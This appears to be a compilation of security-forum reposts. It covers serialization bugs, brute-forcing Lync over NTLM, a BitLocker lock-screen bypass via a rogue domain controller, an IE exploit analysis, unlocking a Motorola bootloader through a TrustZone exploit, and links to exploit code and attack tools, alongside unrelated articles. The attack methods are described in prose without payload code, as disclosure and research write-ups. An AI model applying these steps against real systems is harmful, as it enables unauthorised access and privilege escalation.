Serialization Security Bugs Explained If you’re in information security you’ve probably heard a lot about serialization bugs. They are becoming increasingly common, and I wanted to give a basic overview of how they work and why they’re an issue. The parsing problem So much of security comes down to parsing. It’s the primary reason we need input validation, and the reason that software like antivirus and network protocol analyzers can have so many security issues. The job of a parser is to take input from somewhere else and run it through your own software. That should frighten you. It’s like a CDC employee using the ‘open and lick’ method to test petri dish samples. Bottom If you’re going to parse something, you have to get intimate with it. And that brings us to serialization. Serialization Serialization is the process of capturing a data structure or an object’s state into a (serial) format that can be efficiently stored or transmitted for later consumption. So you can take an object, capture its state, and then put it in memory, write it to disk, or send it over the network. Then at some point the object can be retrieved and consumed, restoring the object’s state. Example A basic example of serialization might be to take the following array: $array = array("a" => 1, "b" => 2, "c" => array("a" => 1, "b" => 2)); And to serialize it into this: a:3:{s:1:"a";i:1;s:1:"b";i:2;s:1:"c";a:2:{s:1:"a";i:1;s:1:"b";i:2;}} At its core, serialization is a type of encoding. The crux So this brings us to the core issue: deserialization requires parsing. In order to go from that serialized format to usable data, some software package needs to unpack that content, figure it out, and then consume it. And this is precisely what parsers are so bad at. And doing it poorly can lead to all manner of flaws, up to and including arbitrary code execution. Summary Parsing untrusted input is hard Serialization takes data and encodes it into opaque formats for transfer and storage To make use of that content, parsers must unpack and consume it It’s extremely hard to do this correctly, and if you do it wrong it could mean code execution This applies to most any language that uses serialization, but some languages (like Java) are in worse shape than others. Notes The Wikipedia article has a good set of language implementations Here’s a writeup on a Java serialization bug. Link: https://danielmiessler.com/study/serialization-security-bugs-explained/

THE MOST FORGOTTEN WEB VULNERABILITIES Written by 0KaL @ WhiteCollarGroup Reviewed by WCG147, 3du and NeoInvasor Introduction PHP is adorable. It’s learning curve is short, yet its features allow you to create virtually any kind of web application. But PHP, as some use to say, allows the programmer to do a lot of weird things. While I really think it’s a good aspect for a programming language, for beginners it might bring a lot of headaches and angry clients. The vulnerabilities that we are going to see here really do deserve some attention from us (as any other vulnerability). They’re not vulnerabilities that will provide, to some attacker, permissions to hack the entire server (maybe this is the reason why it’s so forgotten), but this does not mean that they can’t create a path, sometimes with some basic social engineering1 , for the attacker to reach this target. Download: https://www.exploit-db.com/docs/39434.pdf

Brute-forcing Microsoft Lync via NTLM FEBRUARY 10, 2016 BY BEN LEAVE A COMMENT Ok, so there is good reason why Lync should not be accessible over the Internet similarly to any single factor system. BRUTE-FORCE will usually prevail!!!! I installed burp’s certificate on my Windows host and attempted to login from Lync (From this I was an HTTP NTLM Login request to https://lyncwebact.customer.com/WebTicket/WebTicketService.svc). NTLM like many other services is made fairly simple to brute-force or attempt one password guess against many accounts. I have used hydra for this once before but a colleague recently wrote a pretty decent python script that makes it even easier and you don’t need to know all the switches etc (https://github.com/strawp/random-scripts/blob/master/ntlm-botherer.py). Anyway, to make obtaining the NTLM url simple I wrote a quick python script that located the company DNS records for lyncdiscover and then finds the NTLM url as shown below: https://github.com/benpturner/h00k/blob/master/python/lyncdiscover.py Sursa: http://www.hackwhackandsmack.com/?p=524

From zero to SYSTEM on full disk encrypted Windows system (Part 1) 10 FEBRUARY 2016 on Authentication Bypass, MS16-014, CVE-2016-0049, BitLocker, Full Disk Encryption, Windows Intro Whether you want to protect the operating system components or your personal files, a Full Disk Encryption (FDE) solution allows you to keep track of the confidentiality and integrity. One of the most commonly used FDE solutions is Microsoft Bitlocker®, which due to its integration with the Trusted Platform Module (TPM) as well as the Active Directory environment makes it both user-friendly and manageable in a corporate environment. When the system is protected with a FDE solution, without a pre-boot password, the login or lock screen makes sure attackers with physical access are not able to gain access to the system. In this post we will explain how an attacker with physical access to an active directory integrated system (e.g. through stealing) is able to bypass the login or lock screen, obtain a clear-text version of the user’s password and elevate his privileges to that of a local administrator or SYSTEM. This can be accomplished via two security vulnerabilities which affects all Windows versions (from Vista to 10) and abusing a standard “security” feature. These two vulnerabilities, discovered with the help of my colleague Tom Giliswere reported to Microsoft however only one vulnerability is patched at the time of writing (CVE-2016-0049 / MS16-014). The other one, which allows you to elevate your privileges to that of a local administrator or SYSTEM is still under investigation by Microsoft and is not yet disclosed here. Acknowledgement by Microsoft: https://technet.microsoft.com/en-us/library/security/mt674627.aspx Step 1 – Hibernation – Your friendly neighbourhood password dumper Speaking for myself, and probably a lot of other users, shutting down a laptop has become a thing of the past. In order to be able to rapidly start using your system when travelling from one place to another, we put it into sleep (or hibernation) mode, essentially putting all processes on hold to be easily resumed when needed. Although in order to resume your session after sleep or hibernation, you’ll have to enter your password on the lock screen (or at least I hope so), the system has your password stored somewhere in memory in order to resume the different processes. We want the system to dump the contents of the memory on disk so we can recover it later. Hibernation is there to the rescue, but we need to be able to force the system into hibernation, creating theHIBERFIL.SYS. Luckily, the default configuration of a laptop running Windows depicts going into hibernation if the battery hits a critical low. This feature, by default at set 5%, ensures you don’t lose any unsaved documents when your battery dies. So the first step, in case the laptop is running but put in sleep (or hibernation), is letting the battery die by playing the waiting game... Once we force the laptop into hibernation mode we reboot it and move to the next step. Step 2 – Bypassing the login or lock screen Before we move on, we would like to give credit to Ian Haken, who discovered the original vulnerability affecting Windows Authentication. He presented his findings at BlackHat Europe 2015 which inspired us to investigate further. In order for the original attack to work, the following prerequisites should be met: The target machine is member of a Windows domain The domain user (the target) has previously logged into the machine and his password is cached locally (Optional however pointless without) Full Disk Encryption without any pre-boot authentication (e.g. BitLocker With TPM integration) If these conditions were met, an attacker needed to create a rogue Kerberos server with the targets user account’s password set to a value of choice and indicated as expired. Upon login attempt, Windows would then prompt the user to change the password before continuing. Once the password change procedure is completed, the cached credentials on the machine are updated with the new password set by the attacker. Because the system is not able to establish a secure connection, the password is not updated on the Kerberos server but still allows the attacker to login when the system no longer has an active network connection (using the cached credentials) A pretty straight forward attack but the vulnerability has been out there for years overlooked by many people. Now that the original vulnerability is clear, we want to explain how we managed to bypass this. (More information about the original vulnerability can be found in Ian’s whitepaper here.) The original patch which was rolled out by Microsoft (KB3105256 - Microsoft Security Bulletin MS15-122) actually changes the flow of the password change feature. It first checks if there is a trust between the domain controller and the target machine before changing the password on the target machine. We had to find a way to make the workstation believe the Kerberos server, in our case a rogue Windows domain controller with the same FQDN is a genuine one. In a normal situation, when a computer joins a domain a computer object is created in the active directory which holds various attributes from this system. One of those is the Service-Principal-Name (SPN) attribute which is used for mutual authentication with an instance of a service on the workstation. This SPN is the name by which a client uniquely identifies an instance of a service. Knowing that this information is used to establish mutual authentication we created a computer object with the name of our target machine (which can be easily found). We then moved on to change the servicePrincipalNameattribute by adding the following values: HOST/computername HOST/computername.domain Now follow the same procedure as before (change the user’s password and mark it as expired) and you will be able to change the change the cached password. Disconnect the system from the network and use the newly set password to bypass the login screen and gain full access to the system as the original user. Although the authentication has been bypassed, we still only have the (limited) privileges of the victim’s account (taking into consideration this is not an local administrator). This is where the next step comes in, in which we explain how you can obtain full local administrative privileges just by using standard Windows functionalities and thus not relying on any vulnerable installed software. Step 3 – Privilege escalation to SYSTEM At the time of writing, the vulnerability has not yet been patched by Microsoft and thus cannot be disclosed. Once more information can be safely shared, this post will be updated. Sursa: https://blog.ahmednabeel.com/from-zero-to-system-on-full-disk-encrypted-windows-system/

It’s been a while since a pure JavaScript vulnerability was widely used by exploit kits. The last few years mostly gave us IE Use-After-Free vulnerabilities. When those were dealt with by Microsoft’s IsolatedHeap and MemoryProtection mechanisms, introduced in the middle of 2014, the stage was clear for Flash to take over. Now, as Flash is marching towards its imminent death, Silverlight has been dying for a long time, and Java applets must be signed and played only after the user is prompted, we can expect some new trend to arrive on the scene. CVE-2015-2419 (Jscript9 Memory Corruption), the subject of our paper, was patched 5 months ago, but is still used across most Exploit Kits. However, no satisfying analysis, regarding either its root cause or how to successfully exploit it, has been published. We think an analysis of this kind is needed: First, to see a pure JS exploit for IE 11, despite the heap corruption mitigations in IE mentioned above. Second, unless Microsoft comes up with similar protections for IE’s JS engine, this might be the kickoff for similar exploits as soon as Flash disappears. We started with a working exploit taken from Rig EK (MD5: 4497f09502758ae82f122b21b17d3644. It looks exactly the same as in Angler EK). It’s heavily obfuscated and tricky, which makes the job of understanding the vulnerability, and the exploit directly from the exploit code, very complicated. Let’s dig in to the process of analyzing this exploit. Link: http://blog.checkpoint.com/2016/02/10/too-much-freedom-is-dangerous-understanding-ie-11-cve-2015-2419-exploitation/

Unlocking the Motorola Bootloader In this blog post, we'll explore the Motorola bootloader on recent Qualcomm Snapdragon devices. Our goal will be to unlock the bootloader of a Moto X (2nd Gen), by using the TrustZone kernel code execution vulnerability from the previous blog posts. Note that although we will show the complete unlocking process for this specific device, it should be general enough to work at-least for most modern Motorola devices. WHY MOTOROLA? After reporting the previous TrustZone kernel privilege escalation to Qualcomm, I was gifted a shiny new Moto X. However... There was one little snag - they accidentally sent me a locked device. This was a completely honest mistake, and they did offer many times to unlock the device - but where's the fun in that? So without further ado, let's dive into the Motorola bootloader and see what it takes to unlock it. SETTING THE STAGE Before we start our research, let's begin with a short introduction to the boot process - starting right at the point at which a device is powered on. First - the PBL (Primary Boot Loader), also known as the "BootROM" is executed. Since the PBL is stored within an internal mask ROM, it cannot be modified or provisioned, and is therefore an intrinsic part of the device. As such, it only serves the very minimal purpose of allowing the device to boot, and authenticating and loading the next part of the boot-chain. Then, two secondary bootloaders are loaded, SBL1 (Secondary Boot Loader), followed by SBL2. Their main responsibility is to boot up the various processors on the SoC and configure them so that they're ready to operate. Next up in the boot-chain, the third and last secondary bootloader, SBL3, is loaded. This bootloader, among other tasks, verifies and loads the Android Bootloader - "aboot". Now this is where we get to the part relevant for our unlocking endeavours; the Android Bootloader is the piece of software whose responsibility is, as its name suggests, to load the Android operating system and trigger its execution. This is also the piece of boot-chain that OEMs tend to customize the most, mainly because while the first part of the boot-chain is written by Qualcomm and deals with SoC specifics, the Android bootloader can be used to configure the way the Android OS is loaded. Among the features controlled by aboot is the "bootloader lock" - in other words, aboot is the first piece of the boot-chain which can opt to break the chain of trust (in which each bootloader stage verifies the next) and load an unsigned operating system. For devices with an unlockable bootloader, the unlocking process is usually performed by rebooting the device into a special ("bootloader") mode, and issuing the relevant fastboot command. However, as we will later see, this interface is also handled by aboot. This means that not only doesaboot query the lock status during the regular boot process, but it also houses the code responsible for the actual unlocking process. As you may know, different OEMs take different stances on this issue. In short, "Nexus" devices always ship with an "unlockable" bootloader. In contrast, Samsung doesn't allow bootloader unlocking for most of its devices. Other OEMs, Motorola included, ship their devices locked, but certain devices deemed "eligible" can be unlocked using a "magic" (signed) token supplied by the OEM (although this also voids the warranty for most devices). So... it's all very complex, but also irrelevant. That's because we're going to do the whole process manually - if aboot can control the lock status of the device, this means we should probably be able to do so as well, given an elevated enough set of privileges. GETTING STARTED Now that we have a general grasp of the components involved and of our goal, the next stage is to analyse the actual aboot code. Since the binaries for all stages of the boot-chain are contained within the factory firmware image, that would naturally be a good place to start. There are several download links available - here are a few. In case you would like to follow along with me, I'm going to refer to the symbols in the version "ATT_XT1097_4.4.4_KXE21.187-38". After downloading the firmware image, we are faced with our first challenge - the images are all packed using a proprietary format, in a file called "motoboot.img". However, opening the file up in a hex-editor reveals it has a pretty simple format we can deduce: As you can see above, the sought-after aboot image is stored within this file, along with the TrustZone image, and various stages of the boot-chain. Good. After analysing the structure above, I've written a python script which can be used to unpack all the images from a given Motorola bootloader image,you can find it here. MUCH ADO ABOOT NOTHING We'll start by inspecting the aboot image. Discouragingly, it is 1MB large, so going over it all would be a waste of time. However, as we've mentioned above, when booting the device into the special "bootloader" mode, the actual interaction with the user is provided by aboot itself. This means that we can start by searching for the strings which are displayed when the unlocking process is performed - and continue from there. A short search for the "unlock..." string which is printed after starting the unlock process brings us straight to the function (@0xFF4B874) which deals with the unlocking logic: That was pretty fast! As you can see, after printing the string to the console, three functions are called consecutively, and if all three of them succeed, the device is considered unlocked. Going over the last two functions reveals their purpose is to erase the user's data partitions (which is always performed after the bootloader is unlocked, in order to protect the device owner's privacy). In any case, this means they are irrelevant to the unlocking process itself and are simply side-effects. This leaves us with a single function which, when called, should unlock the bootloader. So does this mean we're done already? Can we just call this function and unlock the device? Actually, not yet. Although the TrustZone exploit allows us to achieve code-execution within the TrustZone kernel, this is only done after the operating system is loaded, at which point, executing aboot code directly could cause all sorts of side-effects (since, for example, the code might assume that there is no operating system/the MMU could be disabled, etc.). And even if it were that simple, perhaps there is something interesting to be learned by fully understanding the locking mechanism itself. Regardless, if we can understand the logic behind the code, we can simply emulate it ourselves, and perform the meaningful parts of it from our TrustZone exploit. Analysing the unlocking function reveals a surprisingly simple high-level logic: Unfortunately, these two functions wreak havoc within IDA (which fails to even display a meaningful call-graph for them). Manually analysing the functions reveals that they are in fact quite similar to one another. They both don't contain much logic of their own, but instead they prepare arguments and call the following function: This is a little surprising - instead of handling the logic itself, this function issues an an SMC (Supervisor Mode Call) in order to invoke a TrustZone system-call from aboot itself! (as we've discussed in previous blog posts). In this case, both functions issue an SMC with the request code 0x3F801. Here is the relevant pseudo-code for each of them: At this point we've gleaned all the information we need from aboot, now lets switch over to the TrustZone kernel to find out what this SMC call does. ENTER STAGE LEFT, TRUSTZONE Now that we've established that an SMC call is made with the command-code 0x3F801, we are left with the task of finding this command within the TrustZone kernel. Going over the TrustZone kernel system calls, we arrive at the following entry: This is a huge function which performs widely different tasks based on the first argument supplied, which we'll call the "command code" from now on. It should be noted an additional flag is passed into this system-call indicating whether or not it was called from a "secure" context. This means that if we try invoking it from the Android OS itself, an argument will be passed marking our invocation is insecure, and will prevent us from performing these operations ourselves. Of course, we can get around this limitation using our TrustZone exploit, but we'll go into that later! As we've seen above, this SMC call is triggered twice, using the command codes #1 and #2 (I've annotated the functions below to improve readability): In short, we can see both commands are used to read and write (respectively) values from something called a "QFuse". QFUSES Much like a real-life fuse, a QFuse is a hardware component which facilitates a "one-time-writeable" piece of memory. Each fuse represents a single bit; fuses which are in-tact represent the bit zero, and "blown" fuses represent the bit one. However, as the name suggests, this operation is irreversible - once a fuse is blown it cannot be "un-blown". Each SoC has it's own arrangement of QFuses, each with it's own unique purpose. Some fuses are already blown when a device is shipped, but others can be blown depending on the user's actions in order to change the way a specific device feature operates. Unfortunately, the information regarding the role of each fuse is not public, and we are therefore left with the single option of reversing the various software components to try and deduce their role. In our case, we call a specific function in order to decide which fuse we are going to read and write: Since we call this function with the second syscall argument, in our case "4", this means we will operate on the fuse at address 0xFC4B86E8. PUTTING IT ALL TOGETHER Now that we understand the aboot and the TrustZone logic, we can put them together to get the full flow: First, aboot calls SMC 0x3F801 with command-code #1 This causes the TrustZone kernel to read and return the QFuse at address 0xFC4B86E8 Then, iff the first bit in the QFuse is disabled, aboot calls SMC 0x3F801 once more, this time with command-code #2 This causes the TrustZone kernel to write the value 1 to the LSB of the aforementioned QFuse. Turns out to be very simple after all - we just need to set a single bit in a single QFuse, and the bootloader will be considered unlocked. But how can QFuses be written? DIY QFUSES Luckily the TrustZone kernel exposes a pair of system-call which allow us to read and write a restricted set of QFuses - tzbsp_qfprom_read_row and tzbsp_qfprom_write_row, respectively. If we can lift those restrictions using our TrustZone exploit, we should be able to use this API in order to blow the wanted QFuse. Lets take a look at these restrictions within the tzbsp_qfprom_write_row system-call: So first, there's a DWORD at 0xFE823D5C which must be set to zero in order for the function's logic to continue. Normally this flag is in fact set to one, thus preventing the usage of the QFuse calls, but we can easily enough overwrite the flag using the TrustZone exploit. Then, there's an additional function called, which is used to make sure that the ranges of fuses being written are "allowed": As we can see, this function goes over a static list of pairs, each denoting the start and end address of the allowed QFuses. This means that in order to pass this check, we can overwrite this static list to include all QFuses (setting the start address to zero and the end address to the maximal QFuse relative address - 0xFFFF). TRYING IT OUT Now that we have everything figured out, it's time to try it out ourselves! I've written some code which does the following: Achieves code-execution within TrustZone Disables the QFuse protections Writes the LSB QFuse in QFuse 0xFC4B86E8 I encourage you to check out the code here: https://github.com/laginimaineb/Alohamora Have fun! FINAL THOUGHTS In this blog post we went over the flow controlled by a single QFuse. But, as you can probably guess, there are many different interesting QFuses out there, waiting to be discovered. On the one hand, blowing a fuse is really "dangerous" - making one small mistake can permanently brick you device. On the other hand, some fuses might facilitate a special set of features that we would like to enable. One such example is the "engineering" fuse; this fuse is mentioned throughout the aboot image, and can be used to enable an amazing range of capabilities such as skipping secure boot, loading unsigned peripheral images, having an unsigned GPT, and much more. However, this fuse is blown in all consumer devices, marking the device as a "non-engineer" device, and disabling these features. But who knows, maybe there are other fuses which are just as important, which have not yet been discovered... Sursa: http://bits-please.blogspot.in/2016/02/unlocking-motorola-bootloader.html

The Research Pirates of the Dark Web After getting shut down late last year, a website that allows free access to paywalled academic papers has sprung back up in a shadowy corner of the Internet. KAVEH WADDELL FEB 9, 2016 There’s a battle raging over whether academic research should be free, and it’s overflowing into the dark web. Most modern scholarly work remains locked behind paywalls, and unless your computer is on the network of a university with an expensive subscription, you have to pay a fee, often around 30 dollars, to access each paper. Many scholars say this system makes publishers rich—Elsevier, a company that controls access to more than 2,000 journals, has a market capitalization about equal to that of Delta Airlines—but does not benefit the academics that conducted the research, or the public at large. Others worry that free academic journals would have a hard time upholding the rigorous standards and peer reviews that the most prestigious paid journals are famous for. Some years ago, a university student in Kazakhstan took it upon herself to set free the vast trove of paywalled academic research. That student, Alexandra Elbakyan, developed Sci-Hub, an online tool that allows users to easily download paywalled papers for free. Sci-Hub uses university networks to access subscription-only academic papers, generally without the knowledge of the academic institutions. When a user asks Sci-Hub to access a paid article, the service will download it from a university that subscribes to the database that owns it. As it delivers the user a pdf of the requested article, it also saves a copy on its own server, so that next time someone requests the paper, they can download the cached version. Unsurprisingly, Elbakyan’s project has drawn the ire of publishers. Last year, Elsevier sued Sci-Hub and an associated website called Library Genesis for violating its copyright. The two websites “operate an international network of piracy and copyright infringement by circumventing legal and authorized means of access to the ScienceDirect database,” Elsevier’s lawyers wrote in a court filing, referring to the company’s subscription database. A judge for the New York Southern District Court ruled in favor of the publisher, and Sci-Hub’s domain, sci-hub.org, was shut down. Soon, the service popped up again under a different domain. But even if the new domain gets shut down, too, Sci-Hub will still be accessible on the dark web, a part of the Internet often associated with drugs, weapons, and child porn. Like its seedy dark-web neighbors, the Sci-Hub site is accessible only through Tor, a network of computers that passes web requests through a randomized series of servers in order to preserve visitors’ anonymity. Illegal activity thrives on this part of the Internet, partly because its contents aren’t visible to search engines like Google. The Tor network makes it very difficult to know where an offending server is, allowing sites like Silk Road, a prominent drug marketplace, to survive for years. (Silk Road was finally shut down in 2013 and its creator, Ross Ulbricht, was sentenced to life in prison.) But the investigation that took down the Silk Road took up countless government resources. It’s unlikely new Sci-Hub website would attract the same amount of negative attention, so the website is likely safe behind the many layers of encryption that protect sites on the dark web. So why go through all this trouble to provide access to pirated academic research? In a letter submitted to the New York district court where she was being sued, Elbakyan said her experience as a student in Kazakhstan drove her to set up the website. Paying upwards of 30 dollars to access a paper is “insane,” she wrote, when researchers regularly need to access tens or even hundreds of articles. Elbakyan says free access to academic research also helps promote researchers’ independence. “Today, subscription prices are very high; an individual person cannot pay them,” she wrote to me in an email. “You need to join one of the few available research institutions, and for that you need to conform to … standards that suppress creativity.” Websites like Sci-Hub and Library Genesis have a lot of support from the academic community, including from the authors whose work is being traded for free in shadowy corners of the Internet. In 2012, during a large-scale academic boycott of Elsevier, even well-endowed Harvard University announced it was having trouble paying large publishers’ annual fees. “We faculty do the research, write the papers, referee papers by other researchers, serve on editorial boards, all of it for free … and then we buy back the results of our labour at outrageous prices,” the former director of the university’s library told The Guardian. Well-organized boycotts and open-access movements continue to flourish in academia. After Elsevier’s lawsuit against Sci-Hub succeeded late last year, a group of researchers, writers, and artists created a website with an open letter in support of Sci-Hub. Likening Elsevier to the the greedy businessman in Antoine de Saint-Exupéry’s The Little Prince, a character who spends all his time mindlessly accumulating a stockpile of stars for profit, the group wrote that the lawsuit was a “big blow” to researchers around the world. “The system is broken,” the essay read. “It devalues us, authors, editors, and readers alike. It parasites on our labor, it thwarts our service to the public, it denies us access.” There will always be techniques for accessing paywalled research for free, even without services like Sci-Hub. Some of them are much less complex than Elbakyan’s website: Researchers and scholars often use the hashtag #icanhazpdfon Twitter to ask fellow academics for paywalled articles. (There’s even been scholarly work published that analyzes the phenomenon—appropriately, the research is free online.) But Sci-Hub’s ingenious methods automate the process, cut out middle men on Twitter, and don’t advertise the request for, essentially, pirated research. And Elbakyan says her website’s presence on the dark web will help keep it accessible even if legal action dismantles Sci-Hub’s new home on the easily accessible surface web. Sursa: http://www.theatlantic.com/technology/archive/2016/02/the-research-pirates-of-the-dark-web/461829/

cve-2014-7920-7921 Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1 The symbols in this exploit are for Android 4.3, for can be adapted to any version up to Android 5.1 Link: https://github.com/laginimaineb/cve-2014-7920-7921

Hackers aren't smart -- people are stupid The cliche is that hackers are geniuses. That's not true, hackers are generally stupid. The top three hacking problems for the last 10 years are "phishing", "password reuse", and "SQL injection". These problems are extremely simple, as measured by the fact that teenagers are able to exploit them. Yet they persist because, unless someone is interested in hacking, they are unable to learn them. They ignore important details. They fail at grasping the core concept. Phishing Phishing happens because the hacker forges email from someone you know and trust, such as your bank. It appears nearly indistinguishable from real email that your bank might send. To be fair, good phishing attacks can fool even the experts. But when read advice from "experts", it's often phrased as "Don't open emails from people you don't know". No, no, no. The problem is that emails appear to come from people you do trust. This advice demonstrates a lack of understanding of the core concept. What's going on here is human instinct. We naturally distrust strangers, and we teach our children to distrust strangers.Therefore, this advice is wired into our brains. Whatever advice we hear from experts, we are likely to translate it into "don't trust strangers" anyway. We have a second instinct of giving advice. We want to tell people "just do this one thing", wrapping up the problem in one nice package. But these instincts war with the core concept, "phishing emails appear to come from those you trust". Thus, average users continue to open emails with reckless abandon, because the core concept never gets through. Password reuse Similarly there is today's gem from the Sydney Morning Herald: When you create accounts on major websites, they frequently require you to "choose 8 letters with upper case, number, and symbol". Therefore, you assume this is some sort of general security advice to protect your account. It's not, not really. Instead, it's a technical detail related to a second layer of defense. In the unlikely event that hackers break into the website, they'll be able able to get the encrypted version of everyone's password. They use password crackers to guess passwords at a rate of a billion-per-second. Easily guessed passwords will get cracked in a fraction of a second, but hard to guess passwords are essentially uncrackable. But it's a detail that only matters once the website has already been hacked. The real problem with passwords is password reuse. People use the same password for unimportant websites, like http://flyfishing.com, as they use for important sites, likehttp://chase.com or their email. Simple hobbyist sites are easily hacked, allowing hackers to download all the email addresses and passwords. Hackers then run tools to automate trying out that combination on sites like Amazon, Gmail, and banks, hoping for a match. Therefore, the correct advice is "don't reuse passwords on important accounts", such as your business accounts and email account (remember: your email account can reset any other password). In other words, the correct advice is the very opposite what the Sydney Morning Herald suggested. The problem here is human nature. We see this requirement ("upper-case and number/symbol") a lot, so we gravitate toward that. It also appeals to our sense of justice, as if people deserve to get hacked for the moral weakness of choosing simple passwords. Thus, we gravitate toward this issue. At the same time, we ignore password reuse, because it's more subtle. Thus we get bad advice from "experts" like the Sydney Morning Herald, advising people to do the very opposite of what they should be doing. This article was passed around a lot today in the cybersec community. We all had a good laugh. SQL injection SQL injection is not an issue for users, but for programmers. However, it shares the same problem that it's extremely simple, yet human nature prevents it from being solved. Most websites are built the same way, with a web server front-end, and a databaseback-end. The web server takes user interactions with the site and converts them into a database query. What you do with a website is data, but the database query is code. Normally, data and code are unrelated and never get mixed up. However, since the website generates code based on data, it's easy to confuse the two. What SQL injection is that the user (the hacker) sends data to a website frontend that actually contains code that causes the backend to do something. That something can be to dump all the credit card numbers, or create an account that allows the hacker to break in. In other words, SQL injection is when websites fail to understand the differences between these two sentences: Susie said "you owe me $10". Susie said you owe me $10. It's best illustrated in the following comic: The core concept is rather easy: don't mix code with data, or as the comic phrases it "sanitize your database inputs". Yet the problem persists because programmers fail to grasp the core concept. The reason is largely that professors fail to understand the core concept. SQL injection has been the most popular hacker attack for more than a decade, but most professors are even older than that. Thus, they continue to teach website design ignoring this problem. The textbooks they use don't eve mention it. Conclusion These are the three most common hacker exploits on the Internet. Teenagers interested in hack learn how to exploit them within a few hours. Yet, the continue to be unsolved because if you aren't interested in the issues, you fail to grasp the core concept. The concept "phishing comes from people you know" to "don't trust emails from strangers". The core concept of hackers exploiting password reuse becomes "choose strong passwords". The core concept of mixing code with data simply gets ignored by programmers. And the problem here isn't just the average person unwilling or unable to grasp the core concept. Instead, confusion is aided by people who are supposed to be trustworthy, like the Sydney Morning Herald, or your college professor. I know it's condescending and rude to point out that "hacking happens because people are stupid", but that's really the problem. I don't know how to point this out in a less rude manner. That's why most hacking persists. By Robert Graham Sursa: http://blog.erratasec.com/2016/02/hackers-arent-smart-people-are-stupid.html#.VrxVCvJ96Uk

Exista per categorie. Vezi dreapta jos cand intri pe o categorie. Nu exista pentru tot forumul, le-am zis dar o sa dureze pana o sa bage, daca o sa bage. Ma gandeam sa fac eu, dar chiar nu am timp si chef...

htop - an interactive process viewer for Unix This is htop, an interactive process viewer for Unix systems. It is a text-mode application (for console or X terminals) and requires ncurses. What's new in htop 2.0 Since version 2.0, htop is now cross-platform! Check out the video and slides of my presentation at FOSDEM 2016 about how this came to be. This release includes code supporting Linux, FreeBSD, OpenBSD and Mac OS X. There are also, of course, some new features: If you're using NCurses 6, htop will also support your mouse wheel for scrolling. Moving meters and columns around in the setup screen is a lot more comfortable now. You can now press "e" to see the set of environment variables for a process. The "graph" mode for meters was revamped, inspired by James Hall's vtop. ...And of course, lots of other tweaks and fixes! Link: http://hisham.hm/htop/

YASUO Description Yasuo is a ruby script that scans for vulnerable 3rd-party web applications. While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on. If you search through Exploit-db, there are over 10,000 remotely exploitable vulnerabilities that exist in tons of web applications/front-ends and could allow an attacker to completely compromise the back-end server. These vulnerabilities range from RCE to malicious file uploads to SQL injection to RFI/LFI etc. Yasuo is built to quickly scan the network for such vulnerable applications thus serving pwnable targets on a silver platter. Link: https://github.com/0xsauby/yasuo

Viper Frank4DD, @ May 2000 Viper is a prute force UNIX-style password cracker for passwords encrypt with crypt. It has been developed from Hale's viper 1.4 Perl program. While there are other more powerful crack programs out, this one is about studying the safety of passwords while hardware speed is increasing drastically. If I remember right, I read that on a PDP-11 the password generation took 30 seconds. Now we can do more then 230.000 generations per second on a single CPU core of a single system, increasing speed by a factor of several million. Still, there is some time to go for a 8-character password on full keyspace, see keyspace.txt. Originally, the ufc-crypt implementation seemed to be the fastest crypt function around, using it made porting the program to different platforms easy. Viper runs under Linux, Solaris, HPUX and DOS/Windows. Link: https://github.com/fm4dd/viper?platform=hootsuite